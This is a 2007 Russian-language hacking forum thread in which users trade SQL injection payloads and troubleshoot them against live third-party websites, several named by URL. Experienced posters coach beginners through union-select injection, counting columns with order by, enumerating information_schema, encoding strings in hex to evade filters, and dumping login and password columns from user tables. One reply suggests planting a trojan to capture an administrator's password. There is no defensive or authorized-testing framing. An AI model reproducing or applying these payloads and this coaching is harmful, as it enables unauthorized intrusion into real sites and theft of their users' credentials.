RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj)
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя |
Сообщение |
<< Старые топики Новые топики >> |
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2007-11-07 23:53:35.353333
|
|
|
Dimonelite
Сообщений: 348
Оценки: 0
Присоединился: 2005-12-05 20:55:07
|
Пристрелите их! Неужели так сложно, ПРЕЖДЕ чем зайти в этот топик, прочесть ХОТЯ БЫ ОДНУ статью про SQL-Инъекции?!
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2007-11-08 12:24:46.533333
|
|
|
Toxic_gl
Сообщений: 17
Оценки: 0
Присоединился: 2007-11-07 22:52:34.470000
|
У меня проблема есть сайт стоит на mysqli 5.0.45 на мой запрос dogs_list.php?group_id=-1/**/union/**/select/**/table_name/**/from/**/information_schema.tables/**/limit/**/120,1/* Выводин название строк. Но строки одмин или что то вроде не нашел а на запрос посмотреть содержимое любой колонке dogs_list.php?group_id=-1/**/union/**/select/**/1/**/from/**/1/* не как не реагирует
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2007-11-08 23:25:18.653333
|
|
|
Dimonelite
Сообщений: 348
Оценки: 0
Присоединился: 2005-12-05 20:55:07
|
Ничего не понял, честно говоря. select 1 from 1… чего ты хотел этим добиться? Не лучше ли выбрать username,user_password из таблицы forum_users? ;)
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2007-11-09 14:19:53.443333
|
|
|
Toxic_gl
Сообщений: 17
Оценки: 0
Присоединился: 2007-11-07 22:52:34.470000
|
Блин не выходит ((( в таблице forum_users только Anonymous а в поле user_password пусто ((( а что либо связанное с аdminom я не нашел. может кто подскажет где искать?
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2007-11-09 15:23:13.343333
|
|
|
SanyaGrek
Сообщений: 28
Оценки: 0
Присоединился: 2007-10-22 10:45:34.196666
|
quote:
У меня проблема есть сайт стоит на mysqli 5.0.45 на мой запрос dogs_list.php?group_id=-1/**/union/**/select/**/table_name/**/from/**/information_schema.tables/**/limit/**/120,1/* Выводин название строк. Но строки одмин или что то вроде не нашел а на запрос посмотреть содержимое любой колонке dogs_list.php?group_id=-1/**/union/**/select/**/1/**/from/**/1/* не как не реагирует тебе выводятся имена не столбцов, а таблиц (information_schema.tables) попробуй union select column_name from information_schema.columns where table_name=[имя таблицы]
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2007-11-09 15:55:41.253333
|
|
|
Toxic_gl
Сообщений: 17
Оценки: 0
Присоединился: 2007-11-07 22:52:34.470000
|
Как мне найти админа в таблицах? я пересмотрел все заголовки их там около 120 и не где не встретил не слово о админе.
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2007-11-09 18:22:54.300000
|
|
|
Dimonelite
Сообщений: 348
Оценки: 0
Присоединился: 2005-12-05 20:55:07
|
quote:
ORIGINAL: Toxic_gl Блин не выходит ((( в таблице forum_users только Anonymous а в поле user_password пусто ((( а что либо связанное с аdminom я не нашел. может кто подскажет где искать? Баклан. Ты выбрал первую строчку из forum_users! А слабо в конце запроса дописывать limit 0,1 limit 1,1 limit 2,1 и т.д., чтобы выбирать поочередно все строчки. упоминания об администраторах сайта я там тоже не нашел, так что можешь забить на это
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2007-11-10 23:08:55.406666
|
|
|
hackers
Сообщений: 3
Оценки: 0
Присоединился: 2007-11-10 19:20:30.156666
|
Здравствуйте! Нашел на сайте скрипт реагирующий на команды: было test.php?id=3 при изменениях типа test.php?id=3' выдает: Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /var/www/html/…/test.php on line 29 поставил test.php?id=1<100 or 2000 изменения работают, ошибки нет. Возможно как то этот запрос завершить и вывести какую нить таблицу или зделать команду для бекапа базы в определённую директорию (в наличии есть открытая на сайте!)? Например: test.php?id=1<100 or 2000 –; select ALL from users
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2007-11-10 23:10:21.250000
|
|
|
hackers
Сообщений: 3
Оценки: 0
Присоединился: 2007-11-10 19:20:30.156666
|
Здравствуйте! Нашел на сайте скрипт реагирующий на команды: было test.php?id=3 при изменениях типа test.php?id=3' выдает: Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /var/www/html/.../test.php on line 29 поставил test.php?id=1<100 or 2000 изменения работают, ошибки нет. Возможно как то этот запрос завершить и вывести какую нить таблицу или зделать команду для бекапа базы в определённую директорию (в наличии есть открытая на сайте!)? Например: test.php?id=1<100 or 2000 --; select ALL from users
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2007-11-11 00:13:20.560000
|
|
|
Dimonelite
Сообщений: 348
Оценки: 0
Присоединился: 2005-12-05 20:55:07
|
Ты имеешь дело с mysql, поэтому 1)Используй в качестве комментария /* 2)Не получится разделять запросы через ;, вообще никак не получится. Нужно подбирать union, если хочешь узнать какие-нибудь данные
test.php?id=1+union+select+1,2,3,... (и в конце /*)
Пока не задолбаешься. как только ошибка исчезнет, изменяй 1 на -1 или на 1+and+1=0 Или за логарифм от количества столбцов в исходном запросе, через order by легко подобрать кол-во полей. За подробностями либо читай сначала эту тему, либо в гугл.
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2007-11-11 15:32:12.186666
|
|
|
Taraseika
Сообщений: 98
Оценки: 0
Присоединился: 2007-09-07 19:32:59.486666
|
скажите пожалуста как найти эти SQL-инъекции
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2007-11-11 15:39:21.913333
|
|
|
hackers
Сообщений: 3
Оценки: 0
Присоединился: 2007-11-10 19:20:30.156666
|
Какой то дурдом, чтот тут не то, перепробывал вот так: test.php?id=-1+union+select+null,null…./* (до 20-30 штук писал… ошибка не исчезла) и вот так: test.php?id=/*union+select+null……/* (до 20-30 штук писал… ошибка не исчезла) :@ p.s. Написал Пхп скрипт на cURL с перебором запросов… фтыкнул 200 null,null.. и 1,1,1… - всеравно выдает ошибку!
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2007-11-11 19:07:06.463333
|
|
|
Dimonelite
Сообщений: 348
Оценки: 0
Присоединился: 2005-12-05 20:55:07
|
quote:
ORIGINAL: hackers и вот так: test.php?id=/*union+select+null……/* (до 20-30 штук писал… ошибка не исчезла) вот так явно незачем. попробуй через order by подобрать кол-во полей. quote:
ORIGINAL: Taraseika скажите пожалуста как найти эти SQL-инъекции Неужели ты думаешь хоть с минимальной вероятностью, что ты первый, кому в голову пришел этот вопрос? Нет! Тогда разумно будет обратиться к гуглу. Прям с таким запросом TO ALL: ОПОМНИТЕСЬ!!! Юзайте ПРЕЖДЕ гугл и мануалы, а уже если что-то совсем не получается, заходите в этот топик. To hackers: … Посмотрел ссылку, которую ты мне прислал. Да, там действительно sql-injection… Мне и в голову не могло прийти, что ты не посмотрел версию mysql, прежде чем пытаться подобрать union. Так вот: Версия 3. Кавычки фильтруются => никаких into outfile уже не допишешь. Занавес.
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2007-11-12 23:59:33.800000
|
|
|
Alantoin
Сообщений: 3
Оценки: 0
Присоединился: 2007-11-11 11:50:59.970000
|
У меня есть вопросик :) вот я нащел сайт… в конце его скрипта который выдаёт пользавателей группы написал stat.php?sector=Moodle' вобшим выдало ошибку sql error: quote:
2007-11-12 22:56:55 /home/go.php 1064 syntax error near 'vtvpmc' AND L.Status <> 'drop' ORDER BY I.Step' at line 20 SELECT I.Theme, I.Item, LEFT(I.Item, POSITION('.' IN I.Item)-1) AS Media, round((Factor * Points - Late)*SubPoints/100, 1) AS Points, S.Status, I.Status as IStatus, I.MinPoints, NULL, P.Login, CONCAT(P.LastName, ' ', P.FirstName, ' ', P.FatherName) AS Name, P.LastName AS FIO, P.SchoolName As Nr, NOW() < ADDDATE(StatDate, INTERVAL 16 HOUR) AS NowStat FROM Item I LEFT JOIN Stat S ON S.Course = I.Course AND S.Theme = I.Theme AND S.Item = I.Item JOIN Person P ON P.Login = S.Login JOIN Login L ON L.Login = S.Login WHERE I.Course = 'tinklai' AND LEFT(I.Item, 5) IN ('test.', 'pasca', 'olimp', 'strik') AND I.Step > 0 AND I.Status in ('next', 'open') AND P.Sector = 'Moodle'' AND L.School = 'vtvpmc' AND L.Status <> 'drop' ORDER BY I.Step что мне теперь добавлять чтоб дорбаться до юзеров ?
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2007-11-13 00:25:02.406666
|
|
|
Dimonelite
Сообщений: 348
Оценки: 0
Присоединился: 2005-12-05 20:55:07
|
stat.php?sector=Moodle' and 1=0 union select 1,2,3…. /* Если не ошибаюсь, то количество полей должно быть равно 13.
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2007-11-13 12:15:03.516666
|
|
|
Toxic_gl
Сообщений: 17
Оценки: 0
Присоединился: 2007-11-07 22:52:34.470000
|
народ кто подскажет где взять программку для перевода символов в char.
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2007-11-13 14:01:56.450000
|
|
|
Dimonelite
Сообщений: 348
Оценки: 0
Присоединился: 2005-12-05 20:55:07
|
Самому написать :) А вообще еще можно перевод в hex юзать. Пиши скрипт на php: <?php $string = '…'; echo "0x".bin2hex($string); ?> и потом спокойно используй и в select, и в where. только в into outfile должны быть реальные кавычки и подобные трюки не прокатят.
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2007-11-16 10:21:17.790000
|
|
|
fastnull
Сообщений: 11
Оценки: 0
Присоединился: 2007-05-06 16:08:34.880000
|
1
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2007-11-16 12:25:38.940000
|
|
|
Dimonelite
Сообщений: 348
Оценки: 0
Присоединился: 2005-12-05 20:55:07
|
Возможно, что в этой таблице просто нет никаких записей. Потому что вариант нехватки привилегий для доступа к ней менее вероятен (уязвимый скрипт работает в той же БД, где и таблица author)
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2007-11-16 15:10:25.736666
|
|
|
MegaBits
Сообщений: 15
Оценки: 0
Присоединился: 2007-05-25 19:10:39.726666
|
http://shop.kalyany.ru/index.php?categoryID=-38+union+select+(USER()/* http://shop.kalyany.ru/index.php?categoryID=38' Подобрал кол-во столбцёв, их там аж 1, но вот инфа не отображаеться почему? http://shop.fans.com.ua/index.php?productID=8' а здесь с помощью ордер бай не подбираеться.
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2007-11-16 17:34:30.066666
|
|
|
Dimonelite
Сообщений: 348
Оценки: 0
Присоединился: 2005-12-05 20:55:07
|
quote:
ORIGINAL: MegaBits http://shop.kalyany.ru/index.php?categoryID=-38+union+select+(USER()/* Подобрал кол-во столбцёв, их там аж 1, но вот инфа не отображаеться почему? Там что-то хитрое. По-моему не получится корректно построить union. Используй char brute, если хочешь выбрать что-то конкретное, например данные форума Invision Power Board ;)
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2007-11-17 01:02:01.886666
|
|
|
MegaBits
Сообщений: 15
Оценки: 0
Присоединился: 2007-05-25 19:10:39.726666
|
to Dimonelite А поподробнее про char brute можешь рассказать или сылку дать.
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2007-11-17 16:34:33.236666
|
|
|
Dimonelite
Сообщений: 348
Оценки: 0
Присоединился: 2005-12-05 20:55:07
|
quote:
ORIGINAL: MegaBits to Dimonelite А поподробнее про char brute можешь рассказать или сылку дать. У нас уже ввели запрет на посылание в гугл? Если нет, то берегись ;)
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2007-11-17 19:55:47.606666
|
|
|
timoxasev
Сообщений: 4
Оценки: 0
Присоединился: 2007-11-15 02:53:49.040000
|
Блин застрял, не могу сопоставить названия таблиц и колонок для запросов….:@ С помощью запроса index.php?GRID=33&CID=104&ID=99999+union+select+1,2,3,Column_name,5,6,7,8,9+from+information_schema.columns получил следeдующие названия колонок, с помощью: index.php?GRID=33&CID=104&ID=99999+union+select+1,2,3,Table_name,5,6,7,8,9+from+information_schema.tables получил след названия таблиц (все писать не буду, возьму самые на мой взгляд интересные): Названия таблиц: Столбцы CHARACTER_SETS DEFAULT_COLLATE_NAME COLLATIONS DESCRIPTION COLLATION_CHARACTER_SET_APPLICABILITY MAXLEN COLUMNS COLLATION_NAME COLUMN_PRIVILEGES ID KEY_COLUMN_USAGE IS_DEFAULT PROFILING INDEX_NAME ROUTINES SEQ_IN_INDEX SCHEMATA COLLATION SCHEMA_PRIVILEGES CARDINALITY STATISTICS SUB_PART TABLES PACKED TABLE_CONSTRAINTS NULLABLE TABLE_PRIVILEGES INDEX_TYPE TRIGGERS COMMENT USER_PRIVILEGES TABLE_TYPE VIEWS ENGINE Categories VERSION GoodsList ROW_FORMAT Groups TABLE_ROWS OrderedCarts AVG_ROW_LENGTH Orders DATA_LENGTH cpg11d_albums MAX_DATA_LENGTH cpg11d_banned INDEX_LENGTH cpg11d_categories DATA_FREE cpg11d_comments AUTO_INCREMENT cpg11d_config CREATE_TIME cpg11d_pictures UPDATE_TIME cpg11d_usergroups CHECK_TIME cpg11d_users TABLE_COLLATION cpg11d_votes CHECKSUM phpbb_auth_access CREATE_OPTIONS phpbb_banlist TABLE_COMMENT phpbb_categories CONSTRAINT_TYPE phpbb_config TRIGGER_CATALOG phpbb_confirm TRIGGER_SCHEMA phpbb_disallow TRIGGER_NAM phpbb_forum_prune phpbb_forums phpbb_groups phpbb_posts phpbb_posts_text phpbb_sessions phpbb_sessions_keys phpbb_themes_name phpbb_user_group phpbb_users phpbb_words GroupsMan Теперь пытаюсь подставлять оба значения в один запрос, перебирая по очереди: index.php?GRID=33&CID=104&ID=99999+union+select+1,2,3,INDEX_NAME,5,6,7,8,9+from+phpbb_user_group/* ???? Какие комбинации не пробую - один фиг ошибка: Unknown column 'INDEX_NAME' in 'field list' :@:@:@:@ Подскажите че делаю не так ???:@:@:@:@:@[:(]
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2007-11-18 09:34:01.546666
|
|
|
timoxasev
Сообщений: 4
Оценки: 0
Присоединился: 2007-11-15 02:53:49.040000
|
Чему всегда поражаюсь на таких сайтах, так это, либо обилию постов с насмешками и посылами в гугл, который меня сюда и привел, либо полной тишине:( +union+select+full_shit,full_shit,full_shit,full_shit,/*
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2007-11-18 11:55:49.153333
|
|
|
Dimonelite
Сообщений: 348
Оценки: 0
Присоединился: 2005-12-05 20:55:07
|
Ты считаешь себя очень умным? Значит в гугл тебя посылать нельзя? А ты ХОТЬ ЧТО-НИБУДЬ знаешь по этой теме? что тебе мешает писать select concat(table_name,char(124),column_name) from information_schema.columns? До этого никак нельзя было додуматься, нет? И в гугле пошарить тоже никак, да? И ты все еще считаешь себя самым умным, а никто на форуме ничего не знают, и только и умеют, что незаслуженно посылать таких, как ты, в гугл? P.S. select column_name from information_schema.columns так ты выбрал названия ВСЕХ колонок от ВСЕХ таблиц. И почему ВСЕ эти колонки должны присутствовать в phpbb_users?
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2007-11-21 21:04:17.390000
|
|
|
ProNick
Сообщений: 16
Оценки: 0
Присоединился: 2007-11-21 20:35:17.220000
|
Кто нибудь поможет с взломом форума на базе YabbSE 1.5.5. ? SQL инъекция в параметре '$postid' в функции ModifyMessage2: postid=1+or+1=1+ORDER+BY+ID_MSG+DESC/* :@
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2007-12-03 00:26:57.050000
|
|
|
joker$
Сообщений: 102
Оценки: 0
Присоединился: 2007-03-09 17:07:42.703333
|
у меня такая трабла когда php?id=394'….то выдает одну ошибку Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in…………, а когда php?id=394+order+by+1/* то никаких ошибок
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2007-12-03 00:41:43.790000
|
|
|
PROPHET07
Сообщений: 79
Оценки: 0
Присоединился: 2007-08-11 00:12:57.956666
|
попробуй php?id=-1+……
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2007-12-03 00:51:39.413333
|
|
|
joker$
Сообщений: 102
Оценки: 0
Присоединился: 2007-03-09 17:07:42.703333
|
вот я нашел как php?id=394'+order+by+8/* потом -394+union+select+1,2,3,4,5,6,7,8/* и нету цифр куда выводить инфу…
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2007-12-03 10:37:56.146666
|
|
|
Dimonelite
Сообщений: 348
Оценки: 0
Присоединился: 2005-12-05 20:55:07
|
Ты сам себе противоречишь, order by ты подбирал, закрывая кавычкой 394, а строя конструкцию с union, уже забыл про кавычку.
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2007-12-03 15:37:12.176666
|
|
|
joker$
Сообщений: 102
Оценки: 0
Присоединился: 2007-03-09 17:07:42.703333
|
А ты думаешь я не пробывал! Это скорее всего blind inj !?
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2007-12-03 19:00:07.396666
|
|
|
snusmumrik
Сообщений: 1
Оценки: 0
Присоединился: 2007-12-03 17:56:51.800000
|
блин, ситуёвина - напал на один сайт на котором стоит фильтрация по букве. тоесть ввожу в адресную строку +union+select+111,concat(login,char(58),password)+from+users+limit+0,1/* - на выходе инфа - "Unknown column 'assword' in 'field list'". пробовал вводить используя аски, хекс. не помогает. вопрос: возможно ли обратиться к колонке не явно, не по имени и получить адекватній результат в виде значения а не просто слова password?
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2007-12-03 20:47:27.293333
|
|
|
PROPHET07
Сообщений: 79
Оценки: 0
Присоединился: 2007-08-11 00:12:57.956666
|
попробуй +union+select+111,concat(login,char(58),password)+from+users+where+column_name=0x70617373776f7264 …….. 0x70617373776f7264 - password както так, хотя может я и ошибаюсь….:D
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2007-12-03 23:06:53.243333
|
|
|
Dimonelite
Сообщений: 348
Оценки: 0
Присоединился: 2005-12-05 20:55:07
|
quote:
ORIGINAL: joker$ А ты думаешь я не пробывал! Это скорее всего blind inj !? По предоставленной тобой информации я не смог полностью осознать, какая у тебя проблема, и что ты сделал для ее решения. Хочешь конкретной помощи - давай конкретную ссылку на уязвимый скрипт.
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2007-12-04 22:26:59.523333
|
|
|
ZloiJoker
Сообщений: 8
Оценки: 0
Присоединился: 2005-06-16 22:37:23
|
Есть скрипт позволяющий делать SQL inject, никаких ограничений USER() выдал что сижу под root@localhost. Вопрос как то можно выяснить какие бд присутсвую в mysql. ?
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2007-12-05 15:46:29.590000
|
|
|
vxcg
Сообщений: 17
Оценки: 0
Присоединился: 2007-11-09 09:14:45.873333
|
8| Помогите пожалуйста. Вот сайт www.berezovka.clan.su . Не знаю что делать? Написан на чём хер его знает, пришёл к выводу что на конструкторском сайте каком-то. Админка www.berezovka.clan.su\admin Просканировал Xspider-ом выплинул какин-то ошибки, чё то c openSSH, куки нашёл, но нечего. Покажите мне ламеру из ламеров что делать в таком случае? Можно ли провести сдесь sql-inj или чё-то другое можно сделать.А?[sm=bc.gif]
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2007-12-05 16:22:46.880000
|
|
|
PROPHET07
Сообщений: 79
Оценки: 0
Присоединился: 2007-08-11 00:12:57.956666
|
сразу видно что ты даже не понимаешь что такое sql-inj …. поповоду сайта - он на укозе, двиг там хороший и админы не спящие…. имхо кроме как пихнуть троя и получить пасс врятли что получится……
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2007-12-05 16:31:20.753333
|
|
|
ZloiJoker
Сообщений: 8
Оценки: 0
Присоединился: 2005-06-16 22:37:23
|
Может всетаки имеет смысл создать по моей теме отдельный топик ? (а то бардак какой то) Вообще как то можно через SQL injecting mysql узнать какие там db т.е show databases; Речь идет про 4 ку и Table 'information_schema.TABLES' doesn't exist
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2007-12-05 18:34:25.430000
|
|
|
founder
Сообщений: 4
Оценки: 0
Присоединился: 2007-12-05 18:10:47.093333
|
Eсть урл вида ?id=1 Такая вещь на него не действует ?id=1', но действуте такая ?id=2-1, отображается то же что и при ?id=1. Все попытки узнать количество полей таким образом ?id=1+union+select+1,2,3,4,5,6… ?id=-1+union+select+1,2,3,4,5,6, увенчались тем, что отображается пустая страница. Это говорит о том, что хоть ?id=2-1 не проверяется, но применить иньекцию нельзя? Пробывал и через ?id=1+order+by+50, то же пустая страница и никаких ошибок…, я понимаю, что если ошибка не отоборажается это ещё не значит, что её нет, но что можно ещё попробывать не знаю. Может есть какие-нибудь соображения?
|
|
|
|
|